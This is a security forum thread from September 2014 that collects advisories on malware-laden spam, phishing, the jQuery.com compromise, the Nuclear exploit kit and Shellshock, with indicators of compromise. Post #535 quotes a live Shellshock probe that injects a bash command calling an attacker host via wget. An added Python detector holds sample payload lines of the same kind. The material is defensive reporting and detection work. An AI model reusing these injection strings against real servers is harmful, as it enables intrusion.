
Thread: SPAM frauds, fakes, and other MALWARE deliveries...

  1. #531
    Adviser Team AplusWebMaster
    Join Date: Oct 2005
    Location: USA
    Posts: 6,881

    Fake 'Voice Mail' SPAM ...

    FYI...

    Fake 'Voice Mail' SPAM
    - http://blog.dynamoo.com/2014/09/acco...-have-new.html
    23 Sep 2014 - "This strangely titled spam leads to malware.
    From: Voice Mail
    Date: 23 September 2014 10:17
    Subject: You have a new voice
    You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
    * The reference number for this message is _qvs8213783583_001
    The transmission length was 78
    Receiving machine ID : R8KU-UY0G3-ONGH
    To download and listen your voice mail please follow the link ...
    The link to this secure message will expire in 24 hours ...


    The link in the email downloads a file from www .ezysoft .in/ocjnvzulsx/VoiceMail.zip which contains a malicious executable VoiceMail.scr which has a VirusTotal detection rate of 2/54*. According to this Anubis report** the malware attempts to phone home to very-english .co.uk which might be worth blocking."
    * https://www.virustotal.com/en-gb/fil...is/1411464313/

    ** http://anubis.iseclab.org/?action=re...7a&format=html

    - http://myonlinesecurity.co.uk/new-vo...e-pdf-malware/
    23 Sep 2014 - "... 23 Sep 2014: VoiceMail.zip (9kb): Extracts to: VoiceMail.scr Current Virus total detections: 2/54*
    * https://www.virustotal.com/en-gb/fil...is/1411464313/
    ___

    jQuery.com compromised to serve malware via drive-by download
    - http://www.net-security.org/malware_news.php?id=2869
    23.09.2014 - "jQuery.com, the official website of the popular cross-platform JavaScript library of the same name, had been compromised and had been -redirecting- visitors to a website hosting the RIG exploit kit and, ultimately, delivering information-stealing malware. While any website compromise is dangerous for users, this one is particularly disconcerting because of the demographic of its users... The attack was first detected on September 18, and given that the malicious redirector was hosted on a domain that was registered on the same day, it's more than likely that that was the day when the attack actually started. RiskIQ researchers* have immediately notified the jQuery Foundation about the compromise, and the site's administrators have -removed- the malicious script. The bad news is that they still don't know how the compromise happened, so it just might happen again. Users who have visited the site on or around September 18 are advised to check whether they have been compromised by the malware. The researchers recommend immediately re-imaging of the system, resetting passwords for user accounts that have been used on it, and checking whether suspicious activity has originated from it (data exfiltration, etc.). The only good news in all of this is that there is no indication that the jQuery library was affected."
    * http://www.riskiq.com/resources/blog...-accounts-risk

    >> https://blog.malwarebytes.org/?s=RIG+exploit+kit

    - https://isc.sans.edu/diary.html?storyid=18699
    2014-09-23

    46.182.31.77: https://www.virustotal.com/en/ip-add...7/information/
    ___

    Nuclear Exploit Kit evolves, includes Silverlight Exploit
    - http://blog.trendmicro.com/trendlabs...light-exploit/
    Sep 23, 2014 - "... We observed that the Nuclear Exploit Kit exploit kit recently included the Silverlight exploit (CVE-2013-0074*) in its scope. We believe that the attackers behind the Nuclear Exploit Kit included Silverlight in its roster of targeted software for two reasons: to have an expanded attack surface and to avoid detection (as not many security solutions have detections for this particular exploit)... This particular exploit has also been used in other exploit kits, such as the Angler Exploit Kit... Microsoft has released a bulletin (Microsoft Security Bulletin MS13-022) to address the associated vulnerability... The number of exploits used by the kit has -doubled- since the start of 2014...
    Timeline of exploits used by the Nuclear Exploit Kit:
    > http://blog.trendmicro.com/trendlabs...imeline-01.jpg
    Vulnerabilities targeted by the current Nuclear Exploit Kit:
    > http://blog.trendmicro.com/trendlabs...ploit_fig4.png
    ... patches have already been released for the vulnerabilities targeted by the Nuclear Exploit Kit..."
    * https://web.nvd.nist.gov/view/vuln/d...=CVE-2013-0074 - 9.3 (HIGH)

    Last edited by AplusWebMaster; 2014-09-24 at 15:40.
    The machine has no brain.
    ......... Use your own.
    Browser check for updates here.
    YOU need to defend against -all- vulnerabilities.
    Hacks only need to find -1- to get in...
    .

  2. #532
    AplusWebMaster

    Fake BankLine, Voice mail, Invoice SPAM, AMEX Phish ...

    FYI...

    Fake BankLine SPAM
    - http://blog.dynamoo.com/2014/09/you-...e-message.html
    24 Sep 2014 - "This -fake- BankLine email leads to malware that is not currently detected by any anti-virus engine:
    From: Bankline [secure.message@ bankline .com]
    Date: 24 September 2014 09:59
    Subject: You have received a new secure message from BankLine
    You have received a secure message.
    Read your secure message by following the link bellow ...
    You will be prompted to open (view) the file or save (download) it to your computer. For best results, save the file first, then open it.
    If you have concerns about the validity of this message, please contact the sender directly. For questions please contact the Bankline Bank Secure Email Help Desk ...
    First time users - will need to register after opening the attachment...


    The link in the email goes to ismashahalam .net/xyzpayohjx/ngkzoeqjjs.html which downloads an archive file from ismashahalam .net/xyzpayohjx/SecureMessage.zip. This in turn contains a malicious file SecureMessage.scr which has a VirusTotal detection rate of 0/50*. The Anubis report** shows that the malware phones home to very-english .co.uk which is worth blocking or monitoring."
    * https://www.virustotal.com/en-gb/fil...is/1411546325/

    ** https://anubis.iseclab.org/?action=r...ef&format=html

    - http://myonlinesecurity.co.uk/receiv...e-pdf-malware/
    24 Sep 2014 - "... 24 Sep 2014: SecureMessage.zip: Extracts to: SecureMessage.scr
    Current Virus total detections: 7/54*..."
    * https://www.virustotal.com/en/file/2...is/1411565004/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake Voice mail SPAM
    - http://myonlinesecurity.co.uk/inclar...e-wav-malware/
    24 Sep 2014 - "'Voice Message Attached from 01636605058 – name unavailable' pretending to come from voicemail@ inclarity .net is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Time: Sep 23, 2014 10:50:00 AM
    Click attachment to listen to Voice Message


    24 September 2014: 01636605058_20140919_105000.wav.zip: Extracts to: 01636605058_20140919_105000.wav.exe
    Current Virus total detections: 12/53*
    This 'Voice Message Attached from 01636605058 – name unavailable' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper wav (sound) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/4...is/1411568872/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake 'overdue invoice' SPAM – malware
    - http://myonlinesecurity.co.uk/remind...voice-malware/
    24 Sep 2014 - "'Reminder of overdue invoice' pretending to come from a random name at a random company and with a random named attachment is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... different subjects with this one having different numbers including:
    Reminder of overdue invoice: 708872110964932
    Overdue Payment: 122274492356288
    Due Date E-Mail Reminder: 417785972641224
    Payment reminder: 461929101577209
    Past Due Reminder Letter: 199488661953143
    Bills Reminder: 325332051074690
    Automatic reminder: 676901889653218
    Late payment: 475999033756578
    Reminder: 215728756825356

    The email looks like:
    Hello,
    This is Rex from Olympus Industrial. After a review of our records, we have found your account is past due.
    Account ID: 5FCDMF9. This notice is a reminder your payment is due.
    Regards,
    Rex Gloeckler
    Olympus Industrial...


    24 September 2014: application_708872110964932_5FCDMF9.rar:
    Extracts to: application_708872110964932_5FCDMF9.exe
    Current Virus total detections: 3/54*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a file with a red £ sign instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/d...is/1411570178/
    ___

    Fake AMEX Phish - 'Home Depot Security concern'
    - http://myonlinesecurity.co.uk/americ...epot-phishing/
    24 Sep 2014 - "We are seeing quite a few American Express phishing attempts trying to get your American Express details. These are very well crafted and look identical to genuine American Express emails. The senders appear to be from American Express until you look carefully at the email headers. Do -not- click -any- links in these emails... Today’s version is the 'American Express – Security concern on Data breach at Home Depot' which is a change to previous versions to attempt to make it more believable and attractive for you to click the link & give your details. They are using the recent Home Depot hack and consequent fraudulent transactions* that are being taken from many victims accounts to scare you into ignoring the usual precautions and get you to give them your details:
    * http://www.cnbc.com/id/102027452
    Email looks like:
    [ AMEX logo ]
    Dear Customer: We are writing to you because we need to speak with you regarding a security concern on your account. The Home Depot recently reported that there was unauthorized access to payment data systems at its U.S. stores. American Express has put fraud controls in place and we continue to closely monitor the situation. Our records indicate that you recently used your American Express card on September 19, 2014.
    We actively monitor accounts for fraud, and if we see unusual activity which may be fraud, our standard practice is to immediately contact our Card Members. There is no need to call us unless you see suspicious activity on your account.
    To ensure the safety of your account , please log on to : ...
    Regularly monitor your transactions online at americanexpress .com. If you notice fraudulent transactions, visit our online Inquiry and Dispute Center
    Enroll in Account Alerts that notify you via email or text messages about potentially fraudulent activities.
    Switch to Paperless Statements that are accessible online through your password-protected account.
    Your prompt response regarding this matter is appreciated.
    Sincerely,
    American Express Identity Protection Team ...


    Following the link in this 'American Express – Security concern on Data breach at Home Depot' or other -spoofed- emails takes you to a website that looks -exactly- like the real American Express site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your American Express account, but also your Bank Account, Email details, webspace (if you have it) They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. Please read our How to protect yourselves page** for simple, sensible advice on how to avoid being infected or having your details stolen by this sort of socially engineered malware..."
    ** http://myonlinesecurity.co.uk/how-to...hten-security/

    - http://threattrack.tumblr.com/post/9...dentials-phish
    Sep 24, 2014
    Screenshot: https://gs1.wac.edgecastcdn.net/8019...PiQ1r6pupn.png
    Tagged: AMEX, American Express, Home Depot, Credentials Phish
    ___

    Netcraft Sep 2014 Web Server Survey
    - http://news.netcraft.com/archives/20...er-survey.html
    24 Sep 2014 - "In the September 2014 survey we received responses from 1,022,954,603 sites — nearly 31 million more than last month. This is the first time the survey has exceeded a -billion- websites, a milestone achievement that was unimaginable two decades ago. Netcraft's first ever survey was carried out over 19 years ago in August 1995. That survey found only 18,957 sites, although the first significant milestone of one million sites was reached in less than two years, by April 1997..."
    ___

    Viator(dot)com - Data Compromise ...
    - https://blog.malwarebytes.org/online...-you-affected/
    Sep 23, 2014 - "You may well be seeing an email appearing in your inbox from Viator .com, a website designed to help you find tours and trips overseas with none of the typical messing about such tasks usually involve. The emails have been sent out because it appears they had a breach* and anything up to 1.4 million customers may have been potentially impacted by the compromise...
    * http://www.viator.com/about/media-ce...leases/pr33251
    Sep 19, 2014

    ... the bad news is that the breach took place a good few weeks ago yet we’re only just hearing about it... there doesn’t appear to have been a massive file posted online yet containing data such as PII related to the compromise... we await more information on this latest high-profile attack."
    ___

    Malvertising campaign - involving DoubleClick and Zedo
    - https://blog.malwarebytes.org/malver...lick-and-zedo/
    Sep 18, 2014
    Update (09/19/14 9:20 AM PT): It appears that the malicious redirection has stopped. Last activity was detected by our honeypots around midnight last night, and nothing else since then. We are still monitoring the situation and will update here if necessary."

    - http://arstechnica.com/security/2014...ched-millions/
    Sep 22 2014

    Last edited by AplusWebMaster; 2014-09-25 at 05:37.

  3. #533
    AplusWebMaster

    Fake Bank transfers/invoice SPAM ...

    FYI...

    Fake Bank transfers/invoice SPAM ...
    - http://blog.dynamoo.com/2014/09/malw...sfer-sage.html
    25 Sep 2014 - "... very aggressive spam run this morning, with at least -four- different email formats pushing the -same- malicious download.

    RBS / Riley Crabtree: "BACS Transfer : Remittance for JSAG814GBP"
    From: Riley Crabtree [creditdepart@ rbs .co.uk]
    Date: 25 September 2014 10:58
    Subject: BACS Transfer : Remittance for JSAG814GBP
    We have arranged a BACS transfer to your bank for the following amount : 4946.00
    Please find details at our secure link ...

    Sage Account & Payroll: "Outdated Invoice"
    From: Sage Account & Payroll [invoice@ sage .com]
    Date: 25 September 2014 10:53
    Subject: Outdated Invoice
    Sage Account & Payroll
    You have an outdated invoice from Sage Accounting that is ready for payment. To find out more details on this invoice, please follow the link ...

    Screenshot: https://1.bp.blogspot.com/-8Mx-CTYIi...1600/sage2.png

    Lloyds Commercial Bank: "Important - Commercial Documents"
    From: Lloyds Commercial Bank [secure@ lloydsbank .com]
    Date: 25 September 2014 11:36
    Subject: Important - Commercial Documents
    Important account documents
    Reference: C400
    Case number: 05363392
    Please review BACs documents.
    Click link below ...

    NatWest Invoice: "Important - New account invoice"
    From: NatWest Invoice [invoice@ natwest .com]
    Date: 25 September 2014 10:28
    Subject: Important - New account invoice
    Your latest NatWest invoice has been uploaded for your review. If you have any questions regarding this invoice, please contact your NatWest service team at the number provided on the invoice for assistance.
    To view/download your invoice please click here ...


    The links in the emails go to different download locations to make it harder to block... In each case the page then directs the victim to download the file Invoice_09252014.zip from the same directory as the html file. This ZIP file contains a malicious executable Invoice_09252014.scr which currently has a VirusTotal detection rate of 3/54*. The Anubis report shows that it phones home to ukrchina-logistics .com which is probably worth blocking or monitoring access to."
    * https://www.virustotal.com/en-gb/fil...is/1411638249/
    ... Behavioural information
    DNS requests
    ukrchina-logistics .com
    TCP connections
    188.165.198.52: https://www.virustotal.com/en-gb/ip-...2/information/
    91.196.0.119

    - http://threattrack.tumblr.com/post/9...e-invoice-spam
    Sep 25, 2014
    Screenshot: https://gs1.wac.edgecastcdn.net/8019...1ql1r6pupn.png
    Tagged: Sage, Upatre
    ___

    Fake BCA SPAM - PDF malware
    - http://myonlinesecurity.co.uk/bca-ba...e-pdf-malware/
    25 Sep 2014 - "'BCA Banking 24.09.14' pretending to come from hallsaccounts <hallsaccounts@ hallsgb .com> is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Accounts Dept
    Halls Holdings Ltd
    Tel: 01743 450700
    Fax: 01743 443759 ...


    25 September 2014: BCA Banking 24.09.14.pdf.zip : Extracts to: BCA Banking 24.09.14.pdf.exe
    Current Virus total detections: 4/53*. This BCA Banking 24.09.14 is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like an image of a barcode to try to fool you instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/c...is/1411646762/
    ... Behavioural information
    UDP communications
    137.170.185.211: https://www.virustotal.com/en/ip-add...1/information/
    ___

    Fake voice mail SPAM – wav malware
    - http://myonlinesecurity.co.uk/outloo...e-wav-malware/
    25 Sep 2014 - "'You have received a voice mail' pretending to come from Microsoft Outlook [no-reply@ Your domain] is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    You received a voice mail : VOICE7838396453.wav (26 KB)
    Caller-Id: 7838396453
    Message-Id: ID9CME
    Email-Id: [redacted]
    This e-mail contains a voice message.
    Download and extract the attachment to listen the message.
    Sent by Microsoft Exchange Server


    25 September 2014 VOICE7838396453.zip (56kb): Extracts to: voicemessage.scr
    Current Virus total detections: 1/55*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper wav (sound) file instead of the .scr file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/c...is/1411657167/
    ___

    Fake Gov't e-mail SCAM
    - https://www.ic3.gov/media/2014/140924.aspx
    Sep 24, 2014 - "Cybercriminals posing as Internet Crime Complaint Center (IC3) employees are defrauding the public. The IC3 has received complaints from victims who were receiving e-mails purported to be from the IC3... Victims report that the unsolicited e-mail sender is a representative of the IC3. The e-mails state that a criminal report was filed on the victim’s name and social security number and legal papers are pending. Scammers impersonate an IC3 employee to increase credibility and use threats of legal action to create a sense of urgency. Victims are informed they have one to two days from the date of the complaint to contact the scammers. Failure to respond to the e-mail will result in an arrest warrant issued to the victim. Some victims stated they were provided further details regarding the ‘criminal charges’ to include violations of federal banking regulations, collateral check fraud, and theft deception. Other victims claimed that their address was correct but their social security number was incorrect. Victims that requested additional information from the scammer were instructed to obtain prepaid money cards to avoid legal action. Victims have reported this -scam- in multiple states... If you receive this type of e-mail:
    - Resist the pressure to act quickly.
    - -Never- wire money based on a telephone request or in an e-mail, especially to an overseas location.
    The IC3 -never- charges the public for filing a complaint and will -never- threaten to have them arrested if they do not respond to an e-mail..."

    Last edited by AplusWebMaster; 2014-09-25 at 23:33.

  4. #534
    AplusWebMaster

    Amazon phish, Fake docs, voicemail, fax SPAM ...

    FYI...

    Amazon phish ...
    - http://myonlinesecurity.co.uk/amazon...tion-phishing/
    26 Sep 2014 - "'Account Confirmation' pretending to come from Amazon .co.uk <auto-confirm@ amazon .co.uk> is a phishing email designed to get your Amazon log in details and then your bank, credit card, address and personal details so they can imitate you and take over your accounts and clean you out...

    Screenshot: http://myonlinesecurity.co.uk/wp-con...nfirmation.png

    Following the link in this Amazon Account Confirmation or other spoofed emails takes you to a website that looks -exactly- like the real Amazon.co.uk site. You are then led through loads of steps to input a lot of private and personal information. Not only will this information enable them to clear out & use your Amazon account, but also your Bank Account, Email details, webspace (if you have it). They then want enough information to completely impersonate you and your identity not only in cyberspace but in real life. All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email or follow links in them ..."
    ___

    Fake docs, voicemail, fax SPAM ...
    - http://blog.dynamoo.com/2014/09/malw...documents.html
    26 Sep 2014 - "... different types of spam to increase click through rates and now some tricky tools to prevent analysis of the malware.

    Employee Documents - Internal Use
    From: victimdomain
    Date: 26 September 2014 09:41
    Subject: Employee Documents - Internal Use
    DOCUMENT NOTIFICATION, Powered by NetDocuments
    DOCUMENT NAME: Employee Documents ...
    Documents are encrypted in transit and store in a secure repository...

    You have a new voice
    From: Voice Mail [Voice.Mail@ victimdomain]
    Date: 26 September 2014 09:30
    Subject: You have a new voice
    You are receiving this message because we were unable to deliver it, voice message did not go through because the voicemail was unavailable at that moment.
    * The reference number for this message is _qvs4004011004_001
    The transmission length was 26
    Receiving machine ID : ES7D-ZNA1D-QF3E
    To download and listen your voice mail please follow the link ...

    RBS: BACS Transfer : Remittance for JSAG244GBP
    From: Douglas Byers [creditdepart@ rbs .co.uk]
    Date: 26 September 2014 10:12
    Subject: BACS Transfer : Remittance for JSAG244GBP
    We have arranged a BACS transfer to your bank for the following amount : 4596.00
    Please find details at our secure link ...

    New Fax
    From: FAX Message [fax@victimdomain]
    Date: 26 September 2014 10:26
    Subject: New Fax
    You have received a new fax .
    Date/Time: Fri, 26 Sep 2014 16:26:36 +0700.
    Your Fax message can be downloaded here ...


    ... The attack has evolved recently.. usually these malicious links forwarded on to another site which had the malicious payload. Because all the links tended to end up at the same site, it was quite easy to block that site and foil the attack. But recently the payload is spread around many different sites making it harder to block. A new one today is that the landing page is somewhat obfuscated to make it harder to analyse, and this time the download is a plain old .scr file rather than a .zip. I've noticed that many anti-virus products are getting quite good at detecting the malicious ZIP files with a generic detection, but not the binary within. By removing the ZIP wrapper, the bad guys have given one less hook for AV engines to find.. malicious binary document7698124-86421_pdf.scr is downloaded from the remote site which has a VirusTotal detection rate of 2/55*. The Anubis report shows the malware attempting to phone home to padav .com which is probably worth blocking."
    * https://www.virustotal.com/en-gb/fil...is/1411724904/
    ___

    Bill.com Spam
    - http://threattrack.tumblr.com/post/9.../bill-com-spam
    Sep 26, 2014 - "Subjects Seen:
    Payment Details [Incident: 711935-599632]
    Typical e-mail details:
    We could not process your Full Payment Submission. The submission for reference ***/UT5236489 was successfully received and was not processed. Check attached copy (PDF Document) for more information.
    Regards,
    Bill.com Payment Operations


    Screenshot: https://gs1.wac.edgecastcdn.net/8019...HaW1r6pupn.png

    Malicious File Name and MD5:
    bill_com_Payment_Details_711935-599632.zip (02EE805D1EACD739BEF4697B26AAC847)
    bill_com_payment_details_ID0000012773616632715381235.pdf.exe (AD24CD2E14DCBF199078BDBBAE4BF0CA)


    Tagged: bill.com, Vawtrak
    ___

    More Fakes - HMRC, BT, RBS SPAM
    - http://blog.dynamoo.com/2014/09/malw...plication.html
    26 Sep 2014 - "Another bunch of spam emails, with the same payload* as this earlier spam run*.

    HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
    From: noreply@ taxreg .hmrc .gov.uk [noreply@ taxreg .hmrc .gov.uk]
    Date: 26 September 2014 12:26
    Subject: HMRC taxes application with reference LZV9 0Q3E W5SD N3GV received
    The application with reference number LZV9 0Q3E W5SD N3GV submitted by you or your agent to register for HM Revenue & Customs (HMRC) taxes has been received and will now be verified. HMRC will contact you if further information is needed.
    Please download/view your HMRC documents here ...

    Important - BT Digital File
    From: Cory Sylvester [Cory.Sylvester@ bt .com]
    Date: 26 September 2014 12:51
    Subject: Important - BT Digital File
    Dear Customer,
    This email contains your BT Digital File. Please scan attached file and reply to this email.
    To download your BT Digital File please follow the link ...

    RBS Bankline: Outstanding invoice
    From: Bankline.Administrator@ rbs .co.uk [Bankline.Administrator@ rbs .co.uk]
    To: <REDACTED>
    Date: 26 September 2014 13:05
    Subject: Outstanding invoice
    {_BODY_TXT}
    Dear [redacted],
    Please find the attached copy invoice which is showing as unpaid on our ledger.
    To download your invoice please click here ...


    In the sample I looked at the malware page downloaded an archive document26092014-008_pdf.zip which in turn contains document26092014-008_pdf.exe which is the same payload* as earlier..."
    * http://blog.dynamoo.com/2014/09/malw...documents.html
    ___

    Fake Barclays SPAM – PDF malware
    - http://myonlinesecurity.co.uk/barcla...e-pdf-malware/
    26 Sep 2014 - "'Barclays Transaction not complete' is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Unable to complete your most recent Transaction. Currently your transaction has a pending status.
    If the transaction was made by mistake please contact our customer service.
    For more details please download payment receipt ...


    26 September 2014: PaymentReceipt262.zip: Extracts to: PaymentReceipt262.exe
    Current Virus total detections: 2/55*. This 'Barclays Transaction not complete' is another one of the spoofed icon files that unless you have “show known file extensions enabled”, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/5...is/1411738617/

    Last edited by AplusWebMaster; 2014-09-26 at 21:19.

  5. #535
    AplusWebMaster (Adviser Team)

    Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24

    FYI...

    Shellshock and MangoHost (mangohost .net) / 83.166.234.0/24
    - http://blog.dynamoo.com/2014/09/evil...mangohost.html
    28 Sep 2014 - "I came across this particular sewer while looking in my logs for Shellshock access attempts yesterday... probing my server at attempting to WGET back to their own network to enumerate vulnerable hosts.
    dynamoo.com:80 83.166.234.133 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http ://ad.dipad .biz/test/http ://dynamoo .com/\""
    ad.dipaz .biz is hosted on 83.166.234.186, so pretty close to the probing IP of 83.166.234.133 which made me suspicious of the whole range... MangoHost claims to be in Moldova, but almost everything to do with them is in Russian, indicating perhaps that whoever runs this is part of the large Russian ethnic minority in Moldova*. MangoHost is run by one Victor Letkovski (виктор летковский) who lives in Chisinau. Until the past few days, MangoHost was hosting the -ransomware- sites listed here** [pastebin]. Past customers include the infamous Darkode forum back in June, and indeed it still hosts jab.darkode .com, whatever that may be (you can guarantee it is nothing good). Currently hosted domains include a collection of -fake- browser plugins, some -malvertising- sites, some porn, spam sites, hacker resources, -ransomware- domains and what might appear to be some fake Russian law firms... I would strongly recommend blocking all traffic to and from 83.166.234.0/24 if you can do it."
    (More detail at the dynamoo URL above.)
    * https://en.wikipedia.org/wiki/Russians_in_Moldova

    ** http://pastebin.com/2mC1pXaJ

    83.166.234.186: https://www.virustotal.com/en/ip-add...6/information/

    83.166.234.133: https://www.virustotal.com/en/ip-add...3/information/
    ___

    Shellshock in the Wild
    - http://www.fireeye.com/blog/uncatego...-the-wild.html
    Sep 27, 2014 - "... We have observed a significant amount of overtly malicious traffic leveraging BASH, including:
    - Malware droppers
    - Reverse shells and backdoors
    - Data exfiltration
    - DDoS
    Some of this suspicious activity appears to be originating from Russia. We suspect bad actors may be conducting an initial dry run, in preparation for a real, potentially larger-scale attack. We believe it’s only a matter of time before attackers exploit the vulnerability to redirect users to malicious hosts, which can result in further compromise... Exploitation Techniques: The Shellshock traffic we have been able to observe is still quite chaotic. It is largely characterized by high volume automated scans and PoC-like exploit scripts... payload is a very small ELF executable (md5: 959aebc9b44c2a5fdd23330d9be1101e) that was submitted to VirusTotal yesterday with 0 detections. It simply creates a reverse shell, connecting to the same IP the payload was downloaded from: 82.118.242.223... We will continue monitoring the threats and keep you updated..."
    (More detail at the fireeye URL above.)

    - http://www.symantec.com/connect/blog...-vulnerability
    Updated: 29 Sep 2014 - "... Businesses, in particular website owners, are most at risk from this bug and should be aware that its exploitation may allow access to their data and provide attackers with a foothold on their network. Accordingly, it is of critical importance to apply any available patches immediately. Linux vendors have issued security advisories for the newly discovered vulnerability including patching information.
    Debian: https://www.debian.org/security/2014/dsa-3032
    Ubuntu: http://www.ubuntu.com/usn/usn-2362-1/
    Red Hat: https://access.redhat.com/articles/1200223
    CentOS: http://centosnow.blogspot.com/2014/0...-centos-5.html
    Novell SUSE: http://support.novell.com/security/c...2014-6271.html
    *Red Hat has updated its advisory to include fixes for a number of remaining issues.
    - https://rhn.redhat.com/errata/RHSA-2014-1306.html
    Last updated on: 2014-09-30
    If a patch is unavailable for a specific distribution of Linux or Unix, it is recommended that users switch to an alternative shell until one becomes available.
    For consumers: Consumers are advised to apply patches to routers and any other web-enabled devices as and when they become available from vendors. Users of Apple’s Mac OS X should be aware that the operating system currently ships with a vulnerable version of Bash. Mac users should apply any patches for OS X when they become available.
    Symantec Protection: Symantec has created an Intrusion Prevention signature for protection against this vulnerability:
    27907 - OS Attack: GNU Bash CVE-2014-6271
    > http://www.symantec.com/security_res...jsp?asid=27907
    Symantec will continue to investigate this vulnerability and provide more details as they become available."

    Last edited by AplusWebMaster; 2014-10-01 at 00:26.
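The dynamoo log line quoted in the post above is the typical shape of a Shellshock (CVE-2014-6271) probe: a bash function definition `() { :;};` placed in an HTTP header, followed by the command the attacker wants executed. The following detector is an added example, not code from the dynamoo or FireEye posts or from the thread author; it parses combined-format access log lines (with Apache's optional leading `vhost:port` field, as in the quoted line) and reports which source IP sent a probe, in which field, and what command was appended. The sample log lines, hostnames (`probe.invalid`) and addresses (documentation ranges) are constructed for the example and are not IoCs from the thread.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Bash function-definition prefix that CVE-2014-6271 parses out of environment
# variables: "() {" ... "}" followed by ";" and the command that then runs.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Combined log format with an optional leading "vhost:port" field (Apache's
# "%v:%p" prefix, as in the dynamoo log line). Referer and User-Agent may
# contain backslash-escaped quotes, so they use an escape-aware pattern.
LOG_RE = re.compile(
    r"^(?:(?P<vhost>\S+)\s+)?(?P<ip>\S+)\s+\S+\s+\S+\s+"
    r"\[(?P<ts>[^\]]+)\]\s+"
    r'"(?P<req>[^"]*)"\s+(?P<status>\d{3})\s+(?P<size>\S+)\s+'
    r'"(?P<ref>(?:[^"\\]|\\.)*)"\s+'
    r'"(?P<ua>(?:[^"\\]|\\.)*)"'
)


@dataclass
class Probe:
    source_ip: str
    timestamp: str
    field: str    # request field that carried the payload: req, ref or ua
    command: str  # the command appended after the function body


def extract_command(value: str) -> Optional[str]:
    """Return the trailing command if value carries a Shellshock prefix."""
    m = SHELLSHOCK_RE.search(value)
    if not m:
        return None
    return value[m.end():].strip()


def scan_line(line: str) -> Optional[Probe]:
    """Parse one access log line and return a Probe if it carries a payload."""
    m = LOG_RE.match(line)
    if not m:
        return None
    for field in ("req", "ref", "ua"):
        cmd = extract_command(m.group(field))
        if cmd is not None:
            return Probe(m.group("ip"), m.group("ts"), field, cmd)
    return None


def scan_log(lines) -> List[Probe]:
    """Scan an iterable of log lines and collect every probe found."""
    return [p for p in (scan_line(line) for line in lines) if p is not None]


# Constructed sample log lines (documentation addresses and a .invalid host,
# not real IoCs). Line 2 mirrors the shape of the probe quoted in the post.
SAMPLE_LOG = [
    r'203.0.113.10 - - [27/Sep/2014:03:00:01 +0100] "GET /index.html HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    r'example.com:80 198.51.100.7 - - [27/Sep/2014:03:08:37 +0100] "GET / HTTP/1.0" 200 11044 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null http://probe.invalid/test/\""',
    r'198.51.100.9 - - [27/Sep/2014:03:09:12 +0100] "GET /cgi-bin/status HTTP/1.1" 404 209 "() { :;}; /usr/bin/id" "curl/7.37.0"',
]

if __name__ == "__main__":
    for p in scan_log(SAMPLE_LOG):
        print(f"{p.timestamp} {p.source_ip} via {p.field}: {p.command}")
```

The detector looks at the request line, Referer and User-Agent because CGI passes all of them to the script's environment; a `200` status on the probe line, as in the quoted log, only means the page was served, not that bash executed the payload, so the IP list this produces is a starting point for blocking and for checking whether the host's bash is patched.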

  6. #536
    AplusWebMaster (Adviser Team)

    Fake SITA, Invoice, Bank SPAM

    FYI...

    Fake SITA SPAM - PDF malware
    - http://myonlinesecurity.co.uk/sita-u...e-pdf-malware/
    29 Sep 2014 - "'Remittance Advice !!!' pretending to come from SITA UK < info @sita .co.uk > is another one from the current bot runs which try to download various Zbots, cryptolocker, ransomware and loads of other malware on your computer. They are using email addresses and subjects that will entice a user to read the email and open the attachment... The email looks like:
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in the statement.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


    Update: a slightly revised email coming out now but still the -same- malware attachment
    Please find attached folder for remittance advice and your outstanding statement from SITA UK.
    Please arrange to send over a credit note as indicated in statement.
    Any queries please contact us on 01934-524004.
    Best Regards,
    Luis Shivani,
    Financial Controller
    SITA UK ...


    29 September 2014: Remittance-Advice.zip: Extracts to: Remittance-Advice.exe
    Current Virus total detections: 39/55* . This 'Remittance Advice !!!' is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
    * https://www.virustotal.com/en/file/d...is/1411951945/
    ... Behavioural information
    UDP communications
